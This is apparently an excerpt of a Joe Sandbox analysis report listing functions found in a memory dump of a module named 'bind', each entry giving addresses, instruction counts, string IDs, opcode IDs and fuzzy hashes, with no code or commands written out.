                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 0$BINARY
                                                                                                                                                                                      • API String ID: 0-1556553403
                                                                                                                                                                                      • Opcode ID: dbf5463f1b26696ad097613312d0e8a281b4cdde38a6e2070d2bb0de8395586b
                                                                                                                                                                                      • Instruction ID: e60323d610b5e953cfa2bbac53d573cb4ccd773d83c01c1116e4164fd3caed25
                                                                                                                                                                                      • Opcode Fuzzy Hash: dbf5463f1b26696ad097613312d0e8a281b4cdde38a6e2070d2bb0de8395586b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E22E1B4E0425A8FDB04CFA8D480A9DBBF1FF98314F658569E859AB355D734E842CF80
                                                                                                                                                                                      Function 61E8D0B6 Relevance: 2.7, Strings: 2, Instructions: 193COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 9ua$BINARY
                                                                                                                                                                                      • API String ID: 0-3775120692
                                                                                                                                                                                      • Opcode ID: 5d1058f1121b4ac832307e0b4c14ecdaa80b0c74fbff9087e03826d3a53d8ce7
                                                                                                                                                                                      • Instruction ID: a257fdc816b75983c87695270593668a71f4eb775f4fb4bb7c1b83965cb32a4b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d1058f1121b4ac832307e0b4c14ecdaa80b0c74fbff9087e03826d3a53d8ce7
                                                                                                                                                                                      • Instruction Fuzzy Hash: ED811978A0461A9FDB41CFA9D58079EBBF1BF88758F21C02AEC58AB354D774D841CB90
                                                                                                                                                                                      Function 61E7A790 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 4
                                                                                                                                                                                      • API String ID: 0-4088798008
                                                                                                                                                                                      • Opcode ID: 69e42c9349b47ab598709cf7bf194c5a9beee1fbfb6073163f528dbfc61e7f72
                                                                                                                                                                                      • Instruction ID: 518d6d0113e266a091a0cbf43dd9b6b92f5400263bfdc1a72100ca210d41eac5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 69e42c9349b47ab598709cf7bf194c5a9beee1fbfb6073163f528dbfc61e7f72
                                                                                                                                                                                      • Instruction Fuzzy Hash: E7C2D274A042598FEB20CFA8C490B9DBBF1BF89308F24C559E855AB390D774E886CF51
                                                                                                                                                                                      Function 61E98FE2 Relevance: 2.2, Strings: 1, Instructions: 993COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                      • API String ID: 0-4108050209
                                                                                                                                                                                      • Opcode ID: c4c3c7ef0a6a5c5010d93d3d05620519da551420264f624f327454c56b771e43
                                                                                                                                                                                      • Instruction ID: b9cfdf9aff36692a2be4ad7309719c75a621d287fa98b86d1028b92f8662c608
                                                                                                                                                                                      • Opcode Fuzzy Hash: c4c3c7ef0a6a5c5010d93d3d05620519da551420264f624f327454c56b771e43
                                                                                                                                                                                      • Instruction Fuzzy Hash: 83A2F775A04229CFDB25CF68C890B99BBB1BB89304F2584D9D88DA7351DB30EE85CF51
                                                                                                                                                                                      Function 61EA91F6 Relevance: 2.2, Strings: 1, Instructions: 922COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: optimize
                                                                                                                                                                                      • API String ID: 0-3797040228
                                                                                                                                                                                      • Opcode ID: 6eb96975db93de7826f791494ecfccf047aa3c0e742976245326a7d7b9a91081
                                                                                                                                                                                      • Instruction ID: 746819fbde02672c5e9b0b23433deca564a22272aedf92c5aa0001529aa1c472
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6eb96975db93de7826f791494ecfccf047aa3c0e742976245326a7d7b9a91081
                                                                                                                                                                                      • Instruction Fuzzy Hash: ABA2E6B4A043698FDB10DF68C88478DBBF1BF89308F2589A9D889AB344D775D985CF41
                                                                                                                                                                                      Function 61E9FBF0 Relevance: 1.7, APIs: 1, Instructions: 496COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1475443563-0
                                                                                                                                                                                      • Opcode ID: 64d60a2be52c4b5a693ac5b088bd32c95982c338ae40431372bbc37e0bb7e892
                                                                                                                                                                                      • Instruction ID: 797909e4487367ccd8785a7356e571bcdb88a46cf15c43a51895c5e5f409efd9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 64d60a2be52c4b5a693ac5b088bd32c95982c338ae40431372bbc37e0bb7e892
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A32EF74A04259CFDB04CFA8C584B8DBBF1BF88318F25C56AE858AB355D774E846CB41
                                                                                                                                                                                      Function 61E40065 Relevance: 1.6, APIs: 1, Instructions: 349COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1475443563-0
                                                                                                                                                                                      • Opcode ID: b3d562801627bbe2542be41e0d5a0d59d81111fa7b9030912dfa6d8dd8cd40b4
                                                                                                                                                                                      • Instruction ID: 5f607dce3bb248c7bc7ba639c908390524c363e3b0c88829d9203463054831df
                                                                                                                                                                                      • Opcode Fuzzy Hash: b3d562801627bbe2542be41e0d5a0d59d81111fa7b9030912dfa6d8dd8cd40b4
                                                                                                                                                                                      • Instruction Fuzzy Hash: D4E12675A04209CFDB04CFA8D49069EBBF2BF98314F29856AEC54EB346D734E951CB90
                                                                                                                                                                                      Function 61E18736 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: h(a
                                                                                                                                                                                      • API String ID: 0-2400461097
                                                                                                                                                                                      • Opcode ID: 5ee77b5fb974a29124882730f08498d74f86221d2b172790f955c6dba14d74d0
                                                                                                                                                                                      • Instruction ID: f5bca11cc97640b6e875e2d2b4b9a879d1eb82f3f63dc60f1c56b61e4975c6c7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ee77b5fb974a29124882730f08498d74f86221d2b172790f955c6dba14d74d0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C91A03090C2918BEB05CEA8D4C2B59BBB2AF85308F6CC199DC499F38AC775D855D791
                                                                                                                                                                                      Function 61E2D68C Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: bua
                                                                                                                                                                                      • API String ID: 0-3993766197
                                                                                                                                                                                      • Opcode ID: 633315b2ebd987899b0574c5a9c2535cb517164b27f88ba4281f08561b9dd3a8
                                                                                                                                                                                      • Instruction ID: 2dbdb228c3cab7288b2b063f09620b15a0131b4afe136593b5dc23e7c01abf69
                                                                                                                                                                                      • Opcode Fuzzy Hash: 633315b2ebd987899b0574c5a9c2535cb517164b27f88ba4281f08561b9dd3a8
                                                                                                                                                                                      • Instruction Fuzzy Hash: BF112A74A0434A8FCB04CF6DC5C058ABBE4FF88265F248529ED48CB301D374E991CB91
                                                                                                                                                                                      Function 61EA5B62 Relevance: .8, Instructions: 840COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: d946905e82edad219484ee83f8be18273151c4643ac63dd0adf4841abefe8826
                                                                                                                                                                                      • Instruction ID: a44220d8eda0408d574e55f09471a4b8d90abc40079a2b9137b2c96c3645ed57
                                                                                                                                                                                      • Opcode Fuzzy Hash: d946905e82edad219484ee83f8be18273151c4643ac63dd0adf4841abefe8826
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3882E275A043598FDB50CFA9C880B8DBBF1BF89318F2585A9E858AB341D774E981CF41
                                                                                                                                                                                      Function 61E6904E Relevance: .8, Instructions: 834COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: cdee5f106130f9c003e98ff858ec0a85d67dd58a6e597a66ac0da64aa36c3f40
                                                                                                                                                                                      • Instruction ID: 64511e9e7bc8a538c31c2dec79f9366059c8cda353a3f8e3c319e5c84b16a323
                                                                                                                                                                                      • Opcode Fuzzy Hash: cdee5f106130f9c003e98ff858ec0a85d67dd58a6e597a66ac0da64aa36c3f40
                                                                                                                                                                                      • Instruction Fuzzy Hash: A382EE74A442598FDB10DFA8C490B9EBBF6BF89308F60842DD899AB345DB74E845CF41
                                                                                                                                                                                      Function 61E9D0C3 Relevance: .6, Instructions: 639COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 21b45eda36355293b148171c297a1f92822421f124cb838ff337ac2fa72ade97
                                                                                                                                                                                      • Instruction ID: bf890a49f948a95996c0874b8a48064969d64c08d11fd484a8260e1bd552f906
                                                                                                                                                                                      • Opcode Fuzzy Hash: 21b45eda36355293b148171c297a1f92822421f124cb838ff337ac2fa72ade97
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4062D2789052298BDB25CF58C9807C9B7F1BB49314F2589EAD848AB351D774EEC1CF90
                                                                                                                                                                                      Function 61E534E3 Relevance: .6, Instructions: 638COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: f1dee7a99a891ee5565045144e6040ae20f3dfe81c55f463185ef443a8cf5625
                                                                                                                                                                                      • Instruction ID: 9d8ba64b78ef50a58b18041be0aa597e26323e47a4c979711dc9b8f68f915d3c
                                                                                                                                                                                      • Opcode Fuzzy Hash: f1dee7a99a891ee5565045144e6040ae20f3dfe81c55f463185ef443a8cf5625
                                                                                                                                                                                      • Instruction Fuzzy Hash: C362D774A05269CFDBA0CF68C880B89B7B1BB48308F2585E9D84DAB345D731EE95CF51
                                                                                                                                                                                      Function 61E55BD7 Relevance: .6, Instructions: 617COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
